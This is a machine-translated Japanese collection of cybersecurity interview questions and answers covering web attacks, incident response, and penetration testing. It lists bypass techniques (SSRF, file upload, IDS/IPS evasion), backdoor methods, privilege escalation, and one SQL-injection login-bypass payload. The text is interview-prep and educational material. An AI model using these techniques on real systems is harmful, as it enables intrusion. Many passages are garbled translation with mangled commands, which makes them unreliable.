2022 年のサイバーセキュリティ面接の質問の概要

2022 年最新のネットワーク セキュリティ会社の実際の面接の質問

質問 1: これまでにどのような安全装置を使用しましたか?また、どのように使用したか教えてください。

回答:私は 360 状況認識 (別名 Bennao) ids/ips/waf/Kelai の完全なトラフィック分析装置などを使用しました。その方法を知っている人を紹介してください。たとえば、360 Bennao は私が参加したと直接言いました。国家警備隊が三峡に入ると、主に分析と判断を行い、警報情報を確認し、ログ分析を使用して内部および外部ネットワークのIP詳細を見つけ、最終的に誤報であるかどうかを判断します。

質問 2: クラウド セキュリティ テクノロジ アーキテクチャについて詳しく知っていますか?

回答:コントロール プレーン漏洩のリスクを最小限に抑えること、クラウド インフラストラクチャ コードとしてポリシーを採用すること、開発者がクラウド環境を安全に構築できるようにすることなどについて、多くのことを学びました。

質問 3: Linux システムのセキュリティをどのように強化していますか? 詳しく説明してください。

答え:

1. パスワードの複雑さ、パスワードの構成(大文字/小文字、数学、特殊文字)を設定します。

2. ログインタイムアウトを設定する

3. パスワードロックポリシーを設定する

4. パスワードの有効期間と最小長を変更する

質問 4: よく使用する不足しているスキャン機器は何ですか?

回答:スキャナには、Tianjing スキャナと NSFOCUS スキャナの 2 種類があります。

質問 5: ips についてどのくらい知っていますか?

回答:タンデム展開のトランスペアレント モード (IP を構成する必要はありません) は複雑です。これには、ネットワーク層保護とアプリケーション層保護の両方があります。主に署名ライブラリに依存します。この署名ライブラリがないと、その機能は非常に制限されます。ブロックを実現するには、内部ネットワークが攻撃を受けた場合、ips からは確認できず、id からのみ確認できます。

質問 6: ネットワーク プロトコルについて何を知っていますか?

回答:オンラインにアクセスして、よく使用されるポートを見つけてください。

質問 7: ssrf をバイパスする方法

回答: SSRF (サーバーサイド リクエスト フォージェリ) @ シンボル バイパス、特殊シンボル置換、302 ジャンプ バイパス、ssrf は gopher プロトコルと連携して許可なく Redis を攻撃します

質問 8: 緊急対応をしたことがありますか?

回答:ファイルのアップロードなど、緊急対応のトラブルシューティングのアイデアなど、いくつかの簡単な緊急事態を実行しました。

緊急イベントが検出され、サーバー ログにアラーム メッセージが表示されます。

管理者アカウントにログインした後、cmd を開き、net user を使用して現在のユーザーを確認し、net localgronp 管理者を使用して現在のユーザーに新しいユーザーがいるかどうかを確認し、イベント ビューアを使用して 4624 ログイン成功イベント情報を検索し、最近のログイン ユーザー名と時刻、ログイン ログを確認する ユーザーの有無、リモート ログイン、ブルート フォース クラッキング動作、Web ログ、Web ホース送信、リモート攻撃を通じて侵入ポイントを把握する 外部サーバー経由で Web シェル スクリプト ファイルをアップロードする。リモート攻撃者は、Web シェル型トロイの木馬をアップロードすることでサーバーを制御し、新しいユーザーを追加してサーバーにリモートでログインし、シャドウ消去ツールを使用してローカル シャドウがあるかどうかを確認します。

アカウント、プロセスの確認、netsata-ano によるポート開放ステータスの確認、疑わしいプロセスの削除、バックドア ファイルの削除、コンピュータのスケジュールされたタスクの確認、taskschd.msc、疑わしいスケジュールされたタスクの削除、ウイルス対策ソフトウェアを使用した包括的なスキャンの実行、およびWebShell を強制終了し、手動で疑わしいアカウントを削除します。

質問 9: ファイアウォールについてどのくらい知っていますか?

回答:ドメイン ファイアウォール、Sangfor ファイアウォールなどについて学びました。

質問 10: 運用保守エンジニアの仕事についての理解を話してください

回答:会社の要塞マシンを管理し、開発部門と協力して、定期的なサーバーのアップグレード、メンテナンス、検査、構成などを実行します。

ネットワーク セキュリティ エンジニアの面接でよく聞かれる質問は何ですか?

質問 1: 一般的な Web 攻撃は何ですか? (SQL インジェクション攻撃とは何ですか? XSS 攻撃とは何ですか? CSRF 攻撃とは何ですか?)

答え:

1.XSS攻撃

【導入】

XSS 攻撃は、実行可能な JavaScript を含むコンテンツ テキストをフォームで送信するなど、クロスサイト スクリプティング攻撃です。サーバーがこれらのスクリプトをフィルタリングまたはエスケープせず、これらのスクリプトがコンテンツの形式でページに公開される場合、他のユーザーがこの Web ページにアクセスすると、ブラウザーがこれらのスクリプトを実行して攻撃を受け、ユーザーの Cookie やその他の情報が取得されます。

【防衛】

1. 機密性の高い Cookie 情報の場合は、ドキュメント オブジェクト内で Cookie が見つからないように HttpOnly を使用します。

2. ユーザーが入力した情報をエスケープします。

2.CSRF攻撃

【導入】

CSRF 攻撃とは、クロスサイト ドメイン リクエスト フォージェリを指します。たとえば、Xiao Ming は、銀行 A の Web サイトを閲覧しているときに、銀行の Web サイトを閉じませんでした。このとき、Xiao Ming は、CSRF 攻撃を実行する Web サイト B を訪問しました。このとき、Web サイト B は、銀行のサーバーへのメッセージ。送金リクエストには、銀行 Web サイト上のシャオ ミンの Cookie 情報が含まれ、パラメータに基づいてシャオ ミンの口座から Web サイト B の所有者の口座に資金が送金されます。URL が応答すると、シャオはミンのお金がなくなってしまった。

【防衛】

1. 機密性の高いリクエストには検証コードを使用します。

2. [HTTP リファラー] フィールドを確認します。Referer フィールドには、HTTP リクエストのソース アドレスが記録されます。銀行 A の Web サイトから送信されたリクエストには Web サイト A のアドレスが含まれ、CSRF アドレスから送信されたリクエストには Web サイト B のアドレスが含まれます。リファラーを確認するだけで済みます。各機密リクエストの値。Web サイト A から渡される場合は値が渡され、それ以外の場合は渡されません。ただし、この方法はブラウザーのセキュリティに依存しているため、完全に安全というわけではなく、一部のブラウザーではリファラーを改ざんすることで CSRF 攻撃が実行される可能性があります。さらに、一部のユーザーがリファラーを無効にすると、サーバーは常に顧客のリクエストを拒否します。

3. リクエストアドレスにトークンを追加して検証します。ユーザーがログインすると、トークンが生成され、セッションに追加されます。リクエストごとに、トークンがセッションから取得され、パラメータの形式でリクエストに追加されます。サーバー側でインターセプタが確立され、トークンは合格しますが、そうでない場合は拒否されます。ただし、この方法にはセキュリティの問題もあります。Web サイトによっては、ユーザーがリンクを投稿できる場合があります。ハッカーが自分の個人 Web サイトのアドレスを Web サイトに公開すると、システムはそのアドレスにトークンも追加します。その後、ハッカーは次のアドレスにトークンを追加できます。自分の Web サイトのアドレス。CSRF 攻撃を開始するには、このトークン パラメータを取得します。

4. HTTP ヘッダーの属性トークンをカスタマイズし、それを確認します。HTTP ヘッダーにカスタム属性としてトークンを配置します。XMLHttpRequest をカプセル化することで、すべてのリクエストに一度にトークン属性を追加できます。こうすることで、トークンがブラウザーのアドレスに公開されなくなります。

3. SQLインジェクション

【導入】

SQL インジェクション攻撃。攻撃者がフォームを送信すると、フォームに関連する SQL ステートメントを入力します。システムはこれらのフィールドを通常の変数として扱い、SQL クエリのためにサーバーに送信します。その後、攻撃者が入力した SQL system.sql ステートメントに接続され、データベース上で特定の操作を実行します。

  たとえば、単純なログインフォームでは

<form action="/login" method="POST"> ユーザー名: <input type="text" name="username" /> パスワード: <input type="password" name="password" /> <input type= "submit" value="登陆" /></form>

  このとき、システムによって処理される SQL ステートメントは次のとおりです。

ユーザー名:=r.Form.Get("ユーザー名")パスワード:=r.Form.Get("パスワード")sql:="SELECT * FROM ユーザー WHERE ユーザー名='"+ユーザー名+"' AND パスワード='"+パスワード+ 「」

  このとき、攻撃者が入力するユーザー名は以下の通り、パスワードは任意の値となります。

myuser' または 'foo' = 'foo' --

  次に、システム SQL ステートメントは次のようになります

SELECT * FROM user WHERE username='myuser' または 'foo' = 'foo' --'' AND パスワード='xxx'

  その後、攻撃者はログインに成功します。

【防衛】

1. フォームのフィルタリング、フォーム送信の合法性の検証、および一部の特殊文字のエスケープ

2. データベース権限を最小限に抑える

3. クエリ ステートメントは、データベースによって提供されるパラメータ化されたクエリ インターフェイスを使用します。SQL を直接結合しないでください。

4. ID認証とセッション

【攻撃】

  ハッカーはブラウザの JS を無効にして、クライアント側の検証を防ぎ、特定の操作を実行します。

【防衛】

1. 機密情報を非表示にします。

2. 機密情報を暗号化します。

3. セッションは定期的に期限切れになります

5. 権限とアクセス制御

【攻撃】

  URL パラメータを変更すると、他の人のページにアクセスできます。たとえば、ハッカーは次のリンクを使用して、特定のモール上の自分の注文リンクにアクセスできます。

https://***.***.com/normal/item.action?orderid=51338221644

  現時点で、Web サイトに関連する許可の検証がない場合は、以下のリンクを通じて他の人の注文にアクセスすることもできます。

https://***.***.com/normal/item.action?orderid=その他のID

  これにより、モール内の他の人のプライバシーが漏洩することになります。

【防衛】

1. 権限システムを追加し、アクセス時の対応する検証を追加します。

6. 安全でない暗号化ストレージ

【防衛】

1. 機密情報を暗号化して保存する

2.MD5暗号化は不要

7. 脆弱性のアップロード

【攻撃】

  攻撃者は画像をアップロードする際に、画像ではないリモート実行可能なスクリプトをアップロードしますが、このとき、侵入者はリモートからスクリプトを実行してサーバーを攻撃することができます。

【防衛】

1. ファイルアップロードの種類を制限する

2. サードパーティのファイルホスティングなどを使用します。

8. トランスポート層は暗号化されません

【防衛】

1. 安全なバージョンの https を使用する

2. 機密情報は https を使用して送信されます

3. 非機密情報は http を使用して送信されます

9. 未検証のリダイレクトと転送

【攻撃】

  フィッシングの場合、ハッカーは脆弱な URL の後にジャンプ パラメータを追加し、そのパラメータをトランスコードしてリンクをユーザーに送信し、ユーザーのクリックを誘導します。このとき、ユーザーはリンクの上部に見覚えのある URL が表示されてクリックします。その結果、ユーザーのクリックは違法な Web サイトにリダイレクトされます。

【防衛】

1.ジャンプホワイトリストを追加する

2. ジャンプする前に、ユーザーは他の疑わしい Web ページにジャンプするように求められます。

10.ウェブシェル

【攻撃】

  ハッカーは、Win システムの攻撃対象 Web サイトに abc.asp;.jsp ファイルをアップロードします。このとき、システムはそれを jsp ファイルとして認識し、サーバーに送信されると、一部のシステムはそれを jsp ファイルとして認識します。 aspファイル。

史上最も包括的なネットワーク セキュリティ面接の質問の概要

質問 1: PHP で絶対パスを使用するにはどうすればよいですか?

答え:

一重引用符はデータベース エラーの原因、間違ったパラメータまたは間違ったパスへのアクセス、phpinfo などのファイルの調査、削除されていないテスト ファイルのスキャンと開発、Google ハッキング、phpmyadmin によるパス /phpmyadmin/libraries/lect_lang.lib.php の報告、脆弱性の悪用、読み取り設定ファイルからパスを見つけて悪用したり、存在しない画像を読み込むローカル画像読み込み機能や、通常インポートできないファイルをアップロードするアップロードポイントなどのWebサイト機能。

質問 2: よく使用される侵入ツールは何ですか?最もよく使用されるのはどれですか?

答え:

げっぷ、nmap、sqlmap、awvs、ant Sword、Ice Scorpion、dirsearch、Yujian など。

イントラネットサーバーへのxssブラインドタイピングの利用

フィッシング管理者情報収集

質問 3: 銛攻撃と水飲み場攻撃は?

答え:

スピア攻撃: トロイの木馬プログラムを電子メールの添付ファイルとしてターゲット コンピュータに送信し、被害者が添付ファイルを開いてトロイの木馬に感染するように誘導することを指します 水飲み場攻撃: 攻撃ターゲットのインターネット アクティビティ パターンを分析し、攻撃対象者が頻繁にアクセスする Web サイトの弱点を突いて、Web サイトに侵入して悪意のあるプログラムを埋め込み、対象者のアクセスを待ちます。

質問 4: 仮想マシンのエスケープとは何ですか?

答え:

仮想マシン ソフトウェアまたは仮想マシン内で実行されているソフトウェアの脆弱性を悪用して、仮想マシン ホストのオペレーティング システムを攻撃または制御します。

質問 5: 中間者攻撃?

答え:

原理:

同一LAN内において、通常のネットワーク通信データを傍受し、データの改ざんや盗聴を行うことにより、

防衛:

ゲートウェイの MAC アドレスと IP アドレスをホストに静的にバインドする ホストの MAC アドレスと IP アドレスをゲートウェイにバインドし、ARP ファイアウォールを使用します。

質問 6: TCP の 3 ウェイ ハンドシェイク プロセスは?

答え:

最初のハンドシェイク: 接続を確立するとき、クライアントは syn パケット (syn=j) をサーバーに送信し、SYN_SEND 状態に入り、サーバーの確認を待ちます 2 番目のハンドシェイク: サーバーは syn パケットを受信し、クライアントの SYN を確認する必要があります(ack=j +1) と同時に、SYN パケット (syn=k)、つまり SYN+ACK パケットも送信します。このとき、サーバーは SYN_RECV 状態に入ります。クライアントはサーバーから SYN+ACK パケットを受信し、確認パケット ACK をサーバーに送信します (ack=k+1)。このパケットが送信された後、クライアントとサーバーは ESTABLISHED 状態に入り、3 ウェイ ハンドシェイクを完了します。

質問 7: 7 層モデルですか?

答え:

アプリケーション層、プレゼンテーション層、セッション層、トランスポート層、ネットワーク層、データリンク層、物理層

質問 8: クラウドのセキュリティについての理解

答え:

並列処理、グリッドコンピューティング、未知のウイルスの動作判定などの新興技術や概念を統合し、ネットワーク上の多数のクライアントを通じてネットワーク内のソフトウェアの異常な動作を監視し、インターネット上のトロイの木馬や悪意のあるプログラムの最新情報を取得し、自動解析・処理を行い、各クライアントにウイルス・トロイの木馬対策を配布

質問 9: WebSocket について学習しましたか?

答え:

WebSocket は、単一の TCP 接続上で全二重通信を行うためのプロトコルであり、その最大の特徴は、サーバーがクライアントにアクティブに情報をプッシュできることと、クライアントもサーバーにアクティブに情報を送信できることです。対話。

質問 10: DDOS とは何ですか? 何?CC攻撃とは何ですか?違いは何ですか?

答え:

DDOS:

分散型サービス拒否攻撃は、正当なサービス リクエストを使用してサービス リソースを占有しすぎ、正当なユーザーがサービス応答を取得できないようにします 主な手法: SYN フラッド UDP フラッド ICMP フラッド 接続フラッド HTTP Get UDP DNS クエリ フラッド

CC攻撃:

フォーラムなどの大量のデータ操作を必要とするページに複数の一般ユーザーが継続的にアクセスすることをシミュレートし、サーバー リソースの浪費、CPU が長時間 100% になること、ネットワークの混雑が発生することをシミュレートします。

2 つの違い:

CC は Web ページを攻撃し、DDOS はサーバーを攻撃します。CC に対する防御はより困難です。閾値は低いです。DDOS は多数のサーバーを必要とします。CC は長期間継続し、DDOS は大きな影響を及ぼします。

質問 11: 地上攻撃とは何ですか?

答え:

DDOS 攻撃の一種である LAN サービス拒否攻撃は、同じ送信元アドレスと宛先アドレスを持つ慎重に作成されたなりすましデータ パケットを送信することにより、対応する保護メカニズムを持たないターゲット デバイスを麻痺させます。

質問 12: 情報はどのように収集しますか?

答え:

サーバー情報: IP、ミドルウェア、オペレーティング システム ドメイン名 Whois、ipwhois、ネットワーク セグメント サブドメイン名検出、Web サイト ディレクトリ スキャン、インターフェイス情報スキャン、ポート スキャン、主要エンジン検索関連情報

質問 13: CRLF インジェクション攻撃とは何ですか?

答え:

「復帰」および「改行」文字を HTTP ストリームに挿入することにより、Web サイトの改ざん、クロスサイト スクリプティング、ハイジャックなどが行われる可能性があります。

質問 14: フロントエンドとバックエンドの両方の観点から XSS を防止しますか?

答え:

フロントエンド:

ユーザー入力の特殊文字はフィルタリングされ、HTML エンティティのユーザー出力エンコーディングにエスケープされます。

後部:

マテリアライズドエンコード関数フィルタは文字長を制限します

質問 15: 港の安全を守るにはどうすればよいですか?

答え:

WAF、IDS、IPSなどの危険なサービスポートを利用して外部からのアクセスを禁止したり、IPアクセスを制限したりするサービスで、定期的にバージョンアップを行っています。

質問 16: Webshel​​l 検出のアイデアは?

答え:

静的検出: シグネチャ、特性値、危険な機能の一致 動的検出: WAF、IDS、およびその他のデバイスのログ検出: IP アクセス ルールおよびページ アクセス ルールによるファイル整合性監視のフィルタリング

質問 17: IIS Web サイトの脆弱性をテストするにはどうすればよいですか? (バージョンによって異なります)

答え:

https://mp.weixin.qq.com/s/5XV984kErF2Zhh-P5aoUwQ

質問 18: GPC とは何ですか? 有効になっている場合、それを回避するにはどうすればよいですか?

答え:

GPC:

php.ini 設定ファイルの Magic_quotes_gpc は、get、post、cookie で渡される一重引用符、二重引用符、バックスラッシュ、および NULL 文字にバックスラッシュを追加する機能を実装します。

バイパス:

PHP5 の GPC は $_SERVER を無視し、http リクエスト ヘッダーにセカンダリ ワイド バイト インジェクションを挿入できます。

質問 19: Web で一般的に使用されている暗号化アルゴリズムは何ですか?

答え:

一方向ハッシュ暗号化 MD5、SHA、MAC 対称暗号化 AES、DES 非対称暗号化 RSA、RSA2

質問 20: XSS では Cookie を取得する以外に何ができますか?

答え:

管理者 IP xss ワーム フィッシング攻撃フロントエンド JS マイニング キーロギングのスクリーンショットを取得する

問題 21: キャリア (またはその他) ネットワークのハイジャック

答え:

オペレーターハイジャック:アドバタイズ DNSハイジャック:DNSを改ざんし、さまざまな手段でネットワークを乗っ取る

質問 22: DNS スプーフィングとは何ですか?

答え:

攻撃者がドメインネームサーバーになりすます不正行為

質問 23: バッファ オーバーフローの原則と防御策

答え:

原理:

バッファに書き込まれるデータの量がバッファの最大容量を超えると、バッファ オーバーフローが発生し、オーバーフローしたデータがハッカーによって悪用されてリモート コード実行の脆弱性が形成されます。

防衛:

オペレーティングシステムの防御バッファ境界チェックに基づいたセキュリティプログラミング

質問 24: サイバーセキュリティインシデントへの緊急対応

答え:

切断:ハッカーによるさらなる操作や痕跡の削除を防ぐため、状況が許せばネットワークからの切断を優先する 証拠収集:ログインログ、Webサイトログ、サービスログを分析してハッカーのIPを特定し、ハッカーが行った操作を確認するバックアップ: サーバー ファイルをバックアップし、侵入前後の変更を比較 ファイル漏洩検出: 上記の手順を使用してビジネスの弱点を見つけ、脆弱性を修復します ウイルス対策: ハッカーが残したバックドア、Web シェル、および管理アカウントを削除します トレーサビリティ: ハッカーの IP アドレス、侵入方法などを記録: アーカイブと防止。

質問 25: 企業の内部セキュリティ

答え:

実名ネットワーキング 重要なネットワーク セグメントを隔離し、USB デバイスへのアクセスを禁止 WIFI ネットワークの IP アドレスと MAC アドレスのバインドを無効にする ネットワーク監視、IDS、および IPS 機器に関する定期的なトレーニングを実施して、従業員のセキュリティ意識を向上させます。

質問 26: オンライン化する前にビジネスをテストする方法と、どのような角度からテストするか

答え:

セキュリティテスト:製品の脆弱性、ページの脆弱性、サービスの脆弱性、機密情報の漏洩、ロジックの脆弱性、脆弱なパスワードの検索 パフォーマンステスト:ストレステスト、機能完全性テスト

質問 27: アプリケーションに脆弱性がありますが、修復または無効化することができません。どうすればよいですか?

答え:

WAF、IDS、およびファイアウォール デバイスを使用して IP ホワイトリスト アクセスを制限する

質問 28: CSRF から保護するにはどうすればよいですか?

答え:

HTTP リファラーフィールドを確認する トークンフィールドを追加して確認する カスタムフィールドを追加して確認する

質問 29: ファイルのアップロードをバイパスするにはどうすればよいですか?

答え:

WAF バイパス:

アップロード フォーム フィールド、フォーム フィールドの大文字と小文字の変更、フォーム フィールドの置換、スペースの追加または削減、フォーム フィールド文字列の連結、二重ファイル アップロード フォームの構築、二重ファイルの同時アップロード、エンコーディング、ジャンク データ入力のバイパス、ファイル名の大文字と小文字のバイパス、バイパス

サーバー検出バイパス:

MIME タイプは、フロントエンド JS 検出をバイパスし、パケットをキャプチャし、パケットを変更し、ブラックリスト バイパスをバイパスします: php3、asa、ashx、Windows 機能 (test.asp_、ストリーム機能)、Apache 解析脆弱性イメージ コンテンツ検出、イメージ horse bypass.htassess bypass を使用します。

ホワイトリスト検出バイパス:

IIS6/7/7.5 解析脆弱性をバイパスするためにアップロードを切り詰めます。nginx の低バージョン解析脆弱性ファイルにはバイパスが含まれています

質問30:認証コード関連の活用ポイント

答え:

検証コードの再利用 検証コードは検証コードが無効であることを識別できます DDOS

質問 31: Cookie について何をテストしますか?

答え:

SQL インジェクション xss 権限バイパスによる機密情報の漏洩

質問 32: ビジネス ロジックの脆弱性の種類をいくつか挙げてください。

答え:

SMS 攻撃によるユーザーのパスワードのリセット、注文金額の変更、忘れたパスワードの変更、悪意のあるチケット詐欺の回避、確認コードの再利用

問題 33: 簡単な説明ファイルに脆弱性が含まれています

答え:

include()、require()、その他の関数など、ファイルインクルード関数を呼び出す場合、ファイル名とパスは厳密に制限されません。

質問 34: ビジネス ロジックの脆弱性とユーザーによる任意のパスワードのリセットの例は何ですか?また、それらの原因は何ですか?

答え:

一般ユーザーが管理ユーザーのパスワードをリセットする 一般ユーザーが一般ユーザーのパスワードをリセットする

ユーザー固有のトークンが設定されていないため、不正アクセスが発生します。

質問 35: ペネトレーションテスト中に、zip ファイルのみをアップロードできる機能が見つかりました。どのようなアイデアが考えられますか?

答え:

シェルは圧縮されてアップロードされ、プログラムは getshell を自己解凍します。脆弱性 getshell を解析してみてください。脆弱性、トロイの木馬、フィッシング管理者を含むファイルを検索します。

質問 36: aspx トロイの木馬が asp よりも大きな権限を持っているのはなぜですか?

答え:

aspx は .net テクノロジを使用しますが、IIS ではデフォルトでサポートされていません。ASPX は .net フレームワークに依存する必要があります。ASP は単なるスクリプト言語です。侵入する場合、asp トロイの木馬には通常ゲスト権限が与えられます。APSX トロイの木馬には通常ユーザー権限が与えられます。

質問 37: ログイン ページを 1 つだけにするためのアイデアは何ですか?

答え:

SQL インジェクション、ユニバーサル パスワード ブルート フォース クラッキング、権限バイパス、ディレクトリ スキャン、機密情報の漏洩

質問 38: どのリクエスト ヘッダーが有害ですか?

答え:

COOKIE インジェクション ユーザー エージェント インジェクション X-Forwarded-For インジェクション リファラー インジェクション

質問39: 水平/垂直/不正アクセスの違いについて話しますか?

答え:

水平オーバーライド: 一般ユーザーが自分のアクセス権限をオーバーライドして、一般ユーザーにアクセスします。 垂直オーバーライド: 一般ユーザーが管理ユーザーにアクセスする権限をオーバーライドします。 不正アクセス: 権限制御が厳密ではないため、ログイン ユーザー ページにアクセスするためにログインする必要はありません。

質問40: xssとは何ですか? 保存された xss を実行する危険性と原則

答え:

保存型、反射型、および DOM 保存型 XSS とは、アプリケーションが Web リクエストを通じて信頼できないデータを取得し、データに XSS コードが含まれているかどうかを確認せずにデータベースに保存することを意味します。

保存された XSS ハザード:

ユーザーの Cookie を盗む XSS フィッシング攻撃 XSS ワーム攻撃 キーロギングの取得 ユーザー情報の取得 スクリーンショットの取得

質問 41: ホストが侵入された疑いがあるのですが、ログはどこで確認すればよいですか?

答え:

システムログインログ サービスアクセスログ Webサイトログ データベースログ

質問 42: Python で一般的に使用される標準ライブラリ

答え:

正規表現 re time モジュール時間 乱数 オペレーティング システム インターフェイス OS 科学計算 数学 ネットワーク リクエスト urlib http ライブラリ リクエスト クローラ ライブラリ Scrapy マルチスレッド ライブラリ スレッド化

質問43: reverse_tcpとbind_tcpの違いは何ですか?

答え:

reverse_tcp: 攻撃マシンはポートと IP を設定します。テストマシン上でペイロードが実行され、攻撃マシンの IP のポートに接続されます。このとき、攻撃マシンがポートを監視すると、テストマシンが接続されている つまり、被制御マシンが積極的に接続しているbind_tcp: 攻撃マシン ポート(LPORT)を設定し、テストマシン上でペイロードを実行し、攻撃マシンがアクセスできるようにポートを開放します。つまり、制御対象のマシンに積極的に接続し、reverse_tcp を使用する方が安全であり、通常はファイアウォールによって検出されません。

質問 44: oauth 認証プロセス中にどのような問題が発生する可能性がありますか?また、その結果としてどのような種類の脆弱性が発生する可能性がありますか?

答え:

CSRF redirect_uri 検証が厳密ではないため、間違ったパラメータが渡される

質問 45: CDN を持つ Web サイトの実際の IP を取得する方法

答え:

グローバル ping クエリ履歴分析は、phpinfo などのプローブ ファイルを記録します。コマンド実行を使用してサーバーまたは DNSlog に接続し、Web サイトの構成を見つけます。第 2 レベルのドメイン名を通じてネットワーク全体をスキャンし、タイトルを照合します。

質問 46: クロスドメインを実現するにはどうすればよいですか?

答え:

jsonp CORS クロスドメイン リソース共有エージェント クロスドメイン リクエスト Html5 postMessage メソッドは、Html5 WebSocket プロトコルに基づいて document.domain クロスサブドメインを変更します http://document.xxx + iframe

質問 47: jsonp クロスドメインと CORS クロスドメインの違いは何ですか?

答え:

jsonp は優れたブラウザ サポートを備えていますが、CORS は IE9 以下のブラウザをサポートしていません。jsonp は GET のみをサポートします。CORS はすべての種類の HTTP リクエストをサポートします。jsonp は 1 つのリクエストのみを送信し、CORS は 2 つの複雑なリクエストを送信します。

質問 48: SSRF 脆弱性の悪用?

答え:

ローカル ファイル読み取りサービスの検出、ポート スキャン攻撃、イントラネット Redis、mysql、fastcgi およびその他のサービス

使用されるプロトコルは次のとおりです: http/s、file、gopher、tftp、dict、ssh、telnet

質問 49: 一般的なバックドア手法は?

答え:

ウィンドウズ:

レジストリ自動開始シフト バックドア リモート コントロール ソフトウェア Webシェル 管理ユーザーの追加 シャドウ ユーザー スケジュールされたタスク DLL ハイジャック レジストリ ハイジャック MBR バックドア WMI バックドア 管理者パスワード レコード

Linux:

SSH バックドア SUID バックドア Crontab スケジュールされたタスク PAM バックドア 管理者アカウントの追加 ルートキット

質問 50: open_basedir のアクセス ディレクトリ制限をバイパスするにはどうすればよいですか?

答え:

コマンド実行関数を使用してバイパスする symlink() 関数を使用して glob 擬似プロトコル バイパスをバイパスする

質問 51: PHP コード監査でよくある問題は何ですか?

答え:

すべてのパラメータのスプライシング方法で SQL インジェクション (よくあること) が発生する可能性があります グローバル変数の登録による変数の上書き フィルタリングされていない fwrite パラメータによるコード実行権限の検証漏れ バックグラウンド関数アクセス インターフェイスでの任意のファイルのアップロード アンシリアル化 逆シリアル化の脆弱性

問52:赤青対決で、青チームが赤チームに反撃する場面や姿勢は?

答え:

釣り、ハニーポット、アリソード RCE

質問 53: Linux のスケジュールされたタスク、ハッカーはスケジュールされたタスクを隠すために何をしますか?

答え:

一時タスク: at、バッチ コマンド

質問 54: Redis 認証なしでシェルを取得する一般的な方法は何ですか?

答え:

Web 絶対パスを使用してシェルを作成する サーバー権限を取得するための SSH 公開キーを作成する マスター/スレーブのコピー getshell

質問 55: JWT の攻撃方法は何ですか? (ヘッダー、ペイロード、署名)

答え:

暗号化アルゴリズムを null に設定すると、認証がバイパスされ、弱いキーの子供パラメータ (任意のファイル読み取り、SQL インジェクション、コマンド インジェクション、未検証の署名、コンテンツの再エンコード) が悪用されます。

質問 56: JAVA ミドルウェアの脆弱性、いくつかの例は何ですか?

答え:

JBoss デシリアライゼーション WebLogic デシリアライゼーション Tomcat の任意のファイル書き込み、弱いパスワード + バックグラウンド getshell

質問 57: DNS テイクアウトはどのような脆弱性に使用できますか?

答え:

エコーなしの SQL ブラインド インジェクション コマンドが XXE ブラインド タイピングを実行する SSRF ブラインド タイピング

HTTP のみでは、JS による Cookie 情報の読み取りが禁止されています。これを回避して Cookie を取得するにはどうすればよいですか?

ログインページのハイジャックフィッシングバイパス

質問 58: ミドルウェアの脆弱性の概要は?

答え:

ここでは、よく悪用される脆弱性についてのみ書きます。

IIS:

IIS6.0 PUT の脆弱性 IIS6.0 リモート コード実行の脆弱性 IIS6.0 解析の脆弱性 IIS 有効化 .net の短いファイル名の脆弱性 IIS7.0/7.5 解析の脆弱性

アパッチ:

未知の拡張機能解析の脆弱性、解析の脆弱性、調整エラーによるディレクトリ トラバーサル

Nginx:

構成エラーによる解析の脆弱性とディレクトリ トラバーサル

トムキャット:

設定エラーによる任意のコード実行および任意ファイル書き込みの脆弱性 弱いパスワード + 管理バックグラウンド war パッケージ展開 getshell マネージャー/html 管理バックグラウンド 弱いパスワード爆発

Jボス:

5.x/6.x デシリアライゼーションの脆弱性 (CVE-2017-12149) JMXInvokerServlet デシリアライゼーション EJBInvokerServlet デシリアライゼーション JMX コンソールへの脆弱なパスワード + 管理バックグラウンド war パッケージ デプロイメント getshell への不正アクセス

ウェブロジック:

XMLDecoder デシリアライゼーションの脆弱性 (CVE-2017-10271 & CVE-2017-3506) wls9_async_response、wls-wsat デシリアライゼーションのリモート コード実行の脆弱性 (CVE-2019-2725) WLS コア コンポーネントのデシリアライゼーション コマンド実行の脆弱性 (CVE-2018 -2628) 弱いパスワード +管理 バックグラウンド war パッケージ デプロイメント getshell

質問 59: Windows システムと Linux システムの特権を昇格するという考えについて話してください。

答え:

ウィンドウズ:

データベース権限昇格: mysql、sqlserver サードパーティ ソフトウェア権限昇格: serv-u DLL ハイジャック システム カーネル オーバーフローの脆弱性権限昇格: cve シリーズ

Linux:

sudo 権限昇格 suid 権限昇格 redis カーネル権限昇格

質問 60: Python にはどのようなフレームワークがあり、どのような脆弱性が発生していますか?

答え:

Django、Flask、Scrapy Django は任意のコードに対して Flask テンプレート インジェクションを実行します

質問61: 小規模プログラムの浸透と通常の浸透の違い

答え:

ペネトレーション プロセスは変更されておらず、パケットのキャプチャとパラメータの変更に関するものです。ペネトレーションとペネトレーションの違いは、ミニ プログラムがパッケージをローカルにダウンロードし、逆コンパイルに逆復元ツールを使用できることです。

質問 62: アプリ自体の脆弱性テストの 4 つの主要なコンポーネント

答え:

アクティビティコンポーネント:

アクティビティ バインディングのブラウザ可能なカスタム プロトコルの ActivityManager の脆弱性

サービスコンポーネント:

権限昇格、サービス拒否攻撃

ブロードキャスト レシーバー コンポーネント:

不適切な権限管理 BroadcastReceiver エクスポートの脆弱性 動的登録ブロードキャスト コンポーネントの露出の脆弱性

コンテンツプロバイダーコンポーネント:

読み取りおよび書き込み権限の脆弱性 コンテンツ プロバイダーでの SQL インジェクションの脆弱性 プロバイダー ファイル ディレクトリ トラバーサルの脆弱性

質問 63: IDS/IPS 保護の原則とバイパスのアイデア

答え:

原理:

IDS はネットワーク層で動作し、バイパス モードで展開されます。ネットワーク トラフィックをキャプチャして分析することで攻撃を検出します。IPS は通常、ネットワーク層もバイパスします。ブロック機能を備えた IDS として理解できます。IDS のアップグレード バージョンです ( IDS によって検出される攻撃もあります)、ネットワーク層とアプリケーション層をカバーできる、ブロックしているデバイスにブロック動作を実行するように通知するデバイス連携モード)

バイパス:

TCP フラグメンテーション: 2 つの TCP パケットを分割 IP フラグメンテーション: 原理は TCP フラグメンテーションと同じですが、重大なパケット損失 プログラムのバグ/パフォーマンスの問題: 大量の無効なパケットを送信し、IPS パフォーマンスを消費します 偽造 TCP ステータス: ステータス追跡に基づいて IPSIPV6 をバイパスしますバイパス: IPv6 アドレスを使用してバイパスします。

質問64: jsonのcsrfの活用

答え:

XMLHttpRequest とフェッチを使用して JSON リクエストを構築し、Flash のクロスドメインと 307 ジャンプを使用して http カスタム ヘッダー制限をバイパスします

json 形式のデータ パケットを使用してテストできる脆弱性は何ですか?

質問65: イントラネットサーバー上の情報を収集するにはどうすればよいですか?

答え:

